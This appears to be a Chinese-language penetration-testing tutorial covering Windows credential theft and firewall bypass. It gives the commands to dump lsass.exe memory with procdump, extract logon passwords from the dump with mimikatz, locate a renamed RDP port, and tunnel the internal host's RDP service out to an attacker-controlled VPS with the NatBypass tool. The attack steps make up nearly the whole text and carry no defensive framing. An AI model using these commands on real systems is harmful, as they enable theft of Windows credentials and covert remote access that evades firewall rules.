Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因
首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略
使用管理员权限,利用procdump64.exe(或procdump32.exe)导出lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp导出lsass.dmp文件的位置在procdump64.exe的目录下
将lsass.dmp导出到mimikatz.exe的目录下
输入如下命令,使用mimikatz.exe读取密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit得到用户名和密码
{ "username":"aaron", "password":"XXX" }在目标机命令行中输入
tasklist /svc可以看到TermService对应的PID为1036再在终端输入
netstat -anto通过PID为1036来查询远程连接的端口,如下图所示,远程连接的端口为3389
通过task来找远程连接端口可以准确找到远程连接的端口,因为很多时候端口是被更改过的
NatBypass是一款lcx(htran)在golang下的实现,通过主动连接具有公网IP的电脑打通隧道可实现内网穿透,让内网主机提供的服务能够借助外网主机来访问。软件实现的端口转发,透明代理,在主机限制入站规则但未限制出站规则的特定情况下可绕过防火墙。
准备一台vps
准备好nb
在vps上输入,监听本机1997,2017端口,开辟两个用于监听内网打隧道的连接端口和其他应用客户端连接的端口
./nb -listen 1997 2017内网主机执行
nb.exe -slave 127.0.0.1:3389 <your_ips>:1997